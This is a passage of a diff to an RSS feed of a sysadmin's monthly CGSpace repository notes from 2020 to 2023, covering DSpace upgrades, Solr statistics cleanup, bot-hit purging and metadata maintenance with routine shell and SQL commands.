of our fields to the crosswalk</li> +</ul> +</li> +</ul> + + + + May, 2023 + https://alanorth.github.io/cgspace-notes/2023-05/ + Wed, 03 May 2023 08:53:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-05/ + <h2 id="2023-05-03">2023-05-03</h2> +<ul> +<li>Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace +<ul> +<li>It seems their password expired, which is annoying</li> +</ul> +</li> +<li>I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week +<ul> +<li>There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;</li> +<li>Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly</li> +</ul> +</li> +<li>Work on cleaning, proofing, and uploading 
twenty-seven records for IFPRI to CGSpace</li> +</ul> + + + + April, 2023 + https://alanorth.github.io/cgspace-notes/2023-04/ + Sun, 02 Apr 2023 08:19:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-04/ + <h2 id="2023-04-02">2023-04-02</h2> +<ul> +<li>Run all system updates on CGSpace and reboot it</li> +<li>I exported CGSpace to CSV to check for any missing Initiative collection mappings +<ul> +<li>I also did a check for missing country/region mappings with csv-metadata-quality</li> +</ul> +</li> +<li>Start a harvest on AReS</li> +</ul> + + + + March, 2023 + https://alanorth.github.io/cgspace-notes/2023-03/ + Wed, 01 Mar 2023 07:58:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-03/ + <h2 id="2023-03-01">2023-03-01</h2> +<ul> +<li>Remove <code>cg.subject.wle</code> and <code>cg.identifier.wletheme</code> from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)</li> +<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28">iso-codes 4.13.0 was released</a>, which incorporates my changes to the common names for Iran, Laos, and Syria</li> +<li>I finally got through with porting the input form from DSpace 6 to DSpace 7</li> +</ul> + + + + February, 2023 + https://alanorth.github.io/cgspace-notes/2023-02/ + Wed, 01 Feb 2023 10:57:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-02/ + <h2 id="2023-02-01">2023-02-01</h2> +<ul> +<li>Export CGSpace to cross check the DOI metadata with Crossref +<ul> +<li>I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;</li> +</ul> +</li> +</ul> + + + + January, 2023 + https://alanorth.github.io/cgspace-notes/2023-01/ + Sun, 01 Jan 2023 08:44:36 +0300 + + https://alanorth.github.io/cgspace-notes/2023-01/ + <h2 id="2023-01-01">2023-01-01</h2> +<ul> +<li>Apply some more ORCID identifiers to items on CGSpace using my <code>2022-09-22-add-orcids.csv</code> file +<ul> +<li>I want to update all ORCID names and refresh them in the database</li> +<li>I see we have some new ones that aren&rsquo;t in our list if I combine with this file:</li> +</ul> +</li> +</ul> + + + + December, 2022 + https://alanorth.github.io/cgspace-notes/2022-12/ + Thu, 01 Dec 2022 08:52:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-12/ + <h2 id="2022-12-01">2022-12-01</h2> +<ul> +<li>Fix some incorrect regions on CGSpace +<ul> +<li>I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions</li> +</ul> +</li> +<li>Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!</li> +<li>Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)</li> +</ul> + + + + November, 2022 + https://alanorth.github.io/cgspace-notes/2022-11/ + Tue, 01 Nov 2022 09:11:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-11/ + <h2 id="2022-11-01">2022-11-01</h2> +<ul> +<li>Last night I re-synced DSpace 7 Test from CGSpace +<ul> +<li>I also updated all my local <code>7_x-dev</code> branches on the latest upstreams</li> +</ul> +</li> +<li>I spent some time updating the authorizations in Alliance collections +<ul> +<li>I want to make sure they use groups instead of individuals where possible!</li> +</ul> +</li> +<li>I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t upload CSVs from the web interface and is a very 
low severity security issue</li> +</ul> + + + + October, 2022 + https://alanorth.github.io/cgspace-notes/2022-10/ + Sat, 01 Oct 2022 19:45:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-10/ + <h2 id="2022-10-01">2022-10-01</h2> +<ul> +<li>Start a harvest on AReS last night</li> +<li>Yesterday I realized how to use <a href="https://im4java.sourceforge.net/docs/dev-guide.html">GraphicsMagick with im4java</a> and I want to re-visit some of my thumbnail tests +<ul> +<li>I&rsquo;m also interested in libvips support via jVips, though last time I checked it was only for Java 8</li> +<li>I filed <a href="https://github.com/criteo/JVips/issues/141">an issue to ask about Java 11+ support</a></li> +</ul> +</li> +</ul> + + + + September, 2022 + https://alanorth.github.io/cgspace-notes/2022-09/ + Thu, 01 Sep 2022 09:41:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-09/ + <h2 id="2022-09-01">2022-09-01</h2> +<ul> +<li>A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet</li> +<li>I tested an item submission on DSpace Test with the Cocoon <code>org.apache.cocoon.uploads.autosave=false</code> change +<ul> +<li>The submission works as expected</li> +</ul> +</li> +<li>Start debugging some region-related issues with csv-metadata-quality +<ul> +<li>I created a new test file <code>test-geography.csv</code> with some different scenarios</li> +<li>I also fixed a few bugs and improved the region-matching logic</li> +</ul> +</li> +</ul> + + + + August, 2022 + https://alanorth.github.io/cgspace-notes/2022-08/ + Mon, 01 Aug 2022 10:22:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-08/ + <h2 id="2022-08-01">2022-08-01</h2> +<ul> +<li>Our request to add <a href="https://github.com/spdx/license-list-XML/issues/1525">CC-BY-3.0-IGO to SPDX</a> was approved a few weeks ago</li> +</ul> + + + + July, 2022 + https://alanorth.github.io/cgspace-notes/2022-07/ + Sat, 02 Jul 2022 14:07:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-07/ + <h2 id="2022-07-02">2022-07-02</h2> +<ul> +<li>I learned how to use the Levenshtein functions in PostgreSQL +<ul> +<li>The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing</li> +<li>Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first</li> +</ul> +</li> +</ul> + + + + June, 2022 + https://alanorth.github.io/cgspace-notes/2022-06/ + Mon, 06 Jun 2022 09:01:36 +0300 + + https://alanorth.github.io/cgspace-notes/2022-06/ + <h2 id="2022-06-06">2022-06-06</h2> +<ul> +<li>Look at the Solr statistics on CGSpace +<ul> +<li>I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS &ldquo;msnbot-&rdquo; using the Solr query <code>dns:*msnbot* AND dns:*.msn.com</code></li> +<li>I purged these first so I could see the other &ldquo;real&rdquo; IPs in the Solr facets</li> +</ul> +</li> +<li>I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent</li> +<li>I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent</li> +<li>I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent +<ul> +<li>There seem to be many more of these:</li> +</ul> +</li> +</ul> + + + + May, 2022 + https://alanorth.github.io/cgspace-notes/2022-05/ + Wed, 04 May 2022 09:13:39 +0300 + + https://alanorth.github.io/cgspace-notes/2022-05/ + <h2 
id="2022-05-04">2022-05-04</h2> +<ul> +<li>I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too: +<ul> +<li>18.207.136.176</li> +<li>185.189.36.248</li> +<li>50.118.223.78</li> +<li>52.70.76.123</li> +<li>3.236.10.11</li> +</ul> +</li> +<li>Looking at the Solr statistics for 2022-04 +<ul> +<li>52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests</li> +<li>64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc</li> +<li>185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt</li> +<li>157.55.39.159 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li> +<li>52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li> +<li>157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests</li> +<li>207.46.13.177 is owned by Microsoft and identifies as bingbot so I don&rsquo;t know why its requests were logged in Solr</li> +<li>If I query Solr for <code>time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.</code> I see a handful of IPs that made 41,000 requests</li> +</ul> +</li> +<li>I purged 93,974 hits from these IPs using my <code>check-spider-ip-hits.sh</code> script</li> +</ul> + + + + April, 2022 + https://alanorth.github.io/cgspace-notes/2022-04/ + Fri, 01 Apr 2022 10:53:39 +0300 + + https://alanorth.github.io/cgspace-notes/2022-04/ + 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54. 
+ + + + March, 2022 + https://alanorth.github.io/cgspace-notes/2022-03/ + Tue, 01 Mar 2022 16:46:54 +0300 + + https://alanorth.github.io/cgspace-notes/2022-03/ + <h2 id="2022-03-01">2022-03-01</h2> +<ul> +<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> + + + + February, 2022 + https://alanorth.github.io/cgspace-notes/2022-02/ + Tue, 01 Feb 2022 14:06:54 +0200 + + https://alanorth.github.io/cgspace-notes/2022-02/ + <h2 id="2022-02-01">2022-02-01</h2> +<ul> +<li>Meeting with Peter and Abenet about CGSpace in the One CGIAR +<ul> +<li>We agreed to buy $5,000 worth of credits from Atmire for future upgrades</li> +<li>We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization</li> +<li>We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one</li> +<li>We agreed to try to do more alignment of affiliations/funders with ROR</li> +</ul> +</li> +</ul> + + + + January, 2022 + https://alanorth.github.io/cgspace-notes/2022-01/ + Sat, 01 Jan 2022 15:20:54 +0200 + + https://alanorth.github.io/cgspace-notes/2022-01/ + <h2 id="2022-01-01">2022-01-01</h2> +<ul> +<li>Start a full harvest on AReS</li> +</ul> + + + + December, 2021 + https://alanorth.github.io/cgspace-notes/2021-12/ + Wed, 01 Dec 2021 16:07:07 +0200 + + https://alanorth.github.io/cgspace-notes/2021-12/ + <h2 id="2021-12-01">2021-12-01</h2> +<ul> +<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> +<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> + + + + November, 2021 + https://alanorth.github.io/cgspace-notes/2021-11/ + Tue, 
02 Nov 2021 22:27:07 +0200 + + https://alanorth.github.io/cgspace-notes/2021-11/ + <h2 id="2021-11-02">2021-11-02</h2> +<ul> +<li>I experimented with manually sharding the Solr statistics on DSpace Test</li> +<li>First I exported all the 2019 stats from CGSpace:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> + + + + October, 2021 + https://alanorth.github.io/cgspace-notes/2021-10/ + Fri, 01 Oct 2021 11:14:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-10/ + <h2 id="2021-10-01">2021-10-01</h2> +<ul> +<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> +<li>So we have 1879/7100 (26.46%) matching already</li> +</ul> + + + + September, 2021 + https://alanorth.github.io/cgspace-notes/2021-09/ + Wed, 01 Sep 2021 09:14:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-09/ + <h2 id="2021-09-02">2021-09-02</h2> +<ul> +<li>Troubleshooting the missing Altmetric scores on AReS +<ul> +<li>Turns out that I didn&rsquo;t actually fix them last month because the check for <code>content.altmetric</code> still exists, and I can&rsquo;t access the DOIs using <code>_h.source.DOI</code> for some reason</li> +<li>I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!</li> +<li>I will change <code>DOI</code> to <code>tomato</code> in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;</li> +<li>Even as <code>tomato</code> I can&rsquo;t access that field as <code>_h.source.tomato</code> in Angular, but it does work as a filter source&hellip; sigh</li> +</ul> +</li> +<li>I&rsquo;m having problems using the OpenRXV API +<ul> +<li>The syntax Moayad showed me last month doesn&rsquo;t seem to honor the 
search query properly&hellip;</li> +</ul> +</li> +</ul> + + + + August, 2021 + https://alanorth.github.io/cgspace-notes/2021-08/ + Sun, 01 Aug 2021 09:01:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-08/ + <h2 id="2021-08-01">2021-08-01</h2> +<ul> +<li>Update Docker images on AReS server (linode20) and reboot the server:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> +<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> +</ul> + + + + July, 2021 + https://alanorth.github.io/cgspace-notes/2021-07/ + Thu, 01 Jul 2021 08:53:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-07/ + <h2 id="2021-07-01">2021-07-01</h2> +<ul> +<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> + + + + June, 2021 + https://alanorth.github.io/cgspace-notes/2021-06/ + Tue, 01 Jun 2021 10:51:07 +0300 + + https://alanorth.github.io/cgspace-notes/2021-06/ + <h2 id="2021-06-01">2021-06-01</h2> +<ul> +<li>IWMI notified me that AReS was down with an HTTP 502 error +<ul> +<li>Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification</li> +<li>I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the <code>angular_nginx</code> container isn&rsquo;t running</li> +<li>I simply started it and AReS was running again:</li> +</ul> +</li> +</ul> + + + + May, 2021 + https://alanorth.github.io/cgspace-notes/2021-05/ + Sun, 02 May 2021 09:50:54 +0300 + + https://alanorth.github.io/cgspace-notes/2021-05/ + <h2 id="2021-05-01">2021-05-01</h2> +<ul> +<li>I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents: +<ul> +<li>&ldquo;RI/1.0&rdquo;, 1337</li> +<li>&ldquo;Microsoft Office Word 2014&rdquo;, 941</li> +</ul> +</li> +<li>I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;</li> +</ul> + + + + April, 2021 + https://alanorth.github.io/cgspace-notes/2021-04/ + Thu, 01 Apr 2021 09:50:54 +0300 + + https://alanorth.github.io/cgspace-notes/2021-04/ + <h2 id="2021-04-01">2021-04-01</h2> +<ul> +<li>I wrote a script to query Sherpa&rsquo;s API for our ISSNs: <code>sherpa-issn-lookup.py</code> +<ul> +<li>I&rsquo;m curious to see how the results compare with the results from Crossref 
yesterday</li> +</ul> +</li> +<li>AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal +<ul> +<li>I simply took everything down with docker-compose and then back up, and then it was OK</li> +<li>Perhaps one of the containers crashed, I should have looked closer but I was in a hurry</li> +</ul> +</li> +</ul> + + + + March, 2021 + https://alanorth.github.io/cgspace-notes/2021-03/ + Mon, 01 Mar 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-03/ + <h2 id="2021-03-01">2021-03-01</h2> +<ul> +<li>Discuss some OpenRXV issues with Abdullah from CodeObia +<ul> +<li>He&rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API</li> +<li>Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies</li> +</ul> +</li> +</ul> + + + + CGSpace CG Core v2 Migration + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + Sun, 21 Feb 2021 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/ + <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p> +<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p> + + + + February, 2021 + https://alanorth.github.io/cgspace-notes/2021-02/ + Mon, 01 Feb 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-02/ + <h2 id="2021-02-01">2021-02-01</h2> +<ul> +<li>Abenet said that CIP found more duplicate records in their export from AReS +<ul> +<li>I re-opened <a href="https://github.com/ilri/OpenRXV/issues/67">the issue</a> on OpenRXV where we had previously noticed this</li> +<li>The shared link where the duplicates are is here: <a href="https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6">https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6</a></li> +</ul> +</li> +<li>I had a call with CodeObia to discuss the work on OpenRXV</li> +<li>Check the results of the AReS harvesting from last night:</li> +</ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> + + + + January, 2021 + https://alanorth.github.io/cgspace-notes/2021-01/ + Sun, 03 Jan 2021 10:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2021-01/ + <h2 id="2021-01-03">2021-01-03</h2> +<ul> +<li>Peter notified me that some filters on AReS were broken again +<ul> +<li>It&rsquo;s the same issue with the field 
names getting <code>.keyword</code> appended to the end that I already <a href="https://github.com/ilri/OpenRXV/issues/66">filed an issue on OpenRXV about last month</a></li> +<li>I fixed the broken filters (careful to not edit any others, lest they break too!)</li> +</ul> +</li> +<li>Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV +<ul> +<li>The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API</li> +<li>I adjusted it to default to 0 and added a note to the admin screen</li> +<li>I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;</li> +<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/66839">this item</a> has 51 views on CGSpace, but 0 on AReS</li> +</ul> +</li> +</ul> + + + + December, 2020 + https://alanorth.github.io/cgspace-notes/2020-12/ + Tue, 01 Dec 2020 11:32:54 +0200 + + https://alanorth.github.io/cgspace-notes/2020-12/ + <h2 id="2020-12-01">2020-12-01</h2> +<ul> +<li>Atmire responded about the issue with duplicate data in our Solr statistics +<ul> +<li>They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet</li> +<li>That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the <code>cua_version</code> field</li> +<li>I started processing those (about 411,000 records):</li> +</ul> +</li> +</ul> + + + + CGSpace DSpace 6 Upgrade + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + Sun, 15 Nov 2020 13:27:35 +0200 + + https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/ + <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p> + + + + November, 2020 + https://alanorth.github.io/cgspace-notes/2020-11/ + Sun, 01 Nov 2020 13:11:54 +0200 + + https://alanorth.github.io/cgspace-notes/2020-11/ + <h2 id="2020-11-01">2020-11-01</h2> +<ul> +<li>Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test +<ul> +<li>So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.</li> +</ul> +</li> +</ul> + + + + October, 2020 + https://alanorth.github.io/cgspace-notes/2020-10/ + Tue, 06 Oct 2020 16:55:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-10/ + <h2 id="2020-10-06">2020-10-06</h2> +<ul> +<li>Add tests for the new <code>/items</code> POST handlers to the DSpace 6.x branch of my <a href="https://github.com/ilri/dspace-statistics-api/tree/v6_x">dspace-statistics-api</a> +<ul> +<li>It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available</li> +<li>Tag and release version 1.3.0 on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0</a></li> +</ul> +</li> +<li>Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump +<ul> +<li>During the FlywayDB migration I got an error:</li> +</ul> +</li> +</ul> + + + + September, 2020 + https://alanorth.github.io/cgspace-notes/2020-09/ + Wed, 02 Sep 2020 15:35:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-09/ + <h2 id="2020-09-02">2020-09-02</h2> +<ul> 
+<li>Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS</li> +<li>The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it +<ul> +<li>I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working</li> +</ul> +</li> +<li>Add <code>Alliance of Bioversity International and CIAT</code> to affiliations on CGSpace</li> +<li>Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button +<ul> +<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/39">https://github.com/ilri/OpenRXV/issues/39</a></li> +</ul> +</li> +<li>I filed an issue on OpenRXV to make some minor edits to the admin UI: <a href="https://github.com/ilri/OpenRXV/issues/40">https://github.com/ilri/OpenRXV/issues/40</a></li> +</ul> + + + + August, 2020 + https://alanorth.github.io/cgspace-notes/2020-08/ + Sun, 02 Aug 2020 15:35:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-08/ + <h2 id="2020-08-02">2020-08-02</h2> +<ul> +<li>I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their <code>cg.coverage.country</code> text values +<ul> +<li>It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)</li> +<li>It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything</li> +<li>It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;</li> +</ul> +</li> +</ul> + + + + July, 2020 + https://alanorth.github.io/cgspace-notes/2020-07/ + Wed, 01 Jul 2020 10:53:54 +0300 + + https://alanorth.github.io/cgspace-notes/2020-07/ + <h2 id="2020-07-01">2020-07-01</h2> +<ul> +<li>A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank +<ul> +<li>I looked at the PostgreSQL locks but they don&rsquo;t seem unusual</li> +<li>I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved</li> +<li>I restarted Tomcat and PostgreSQL and the issue was gone</li> +</ul> +</li> +<li>Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the <code>5_x-prod</code> branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request</li> +</ul> + + + + June, 2020 + https://alanorth.github.io/cgspace-notes/2020-06/ + Mon, 01 Jun 2020 13:55:39 +0300 + + https://alanorth.github.io/cgspace-notes/2020-06/ + <h2 id="2020-06-01">2020-06-01</h2> +<ul> +<li>I tried to run the <code>AtomicStatisticsUpdateCLI</code> CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday +<ul> +<li>I sent Atmire the dspace.log from today and told them to log into the server to debug the process</li> +</ul> +</li> +<li>In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working</li> +<li>I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:</li> +</ul> + + + + May, 2020 + https://alanorth.github.io/cgspace-notes/2020-05/ + Sat, 02 May 2020 09:52:04 +0300 + + https://alanorth.github.io/cgspace-notes/2020-05/ + <h2 id="2020-05-02">2020-05-02</h2> +<ul> +<li>Peter said that 
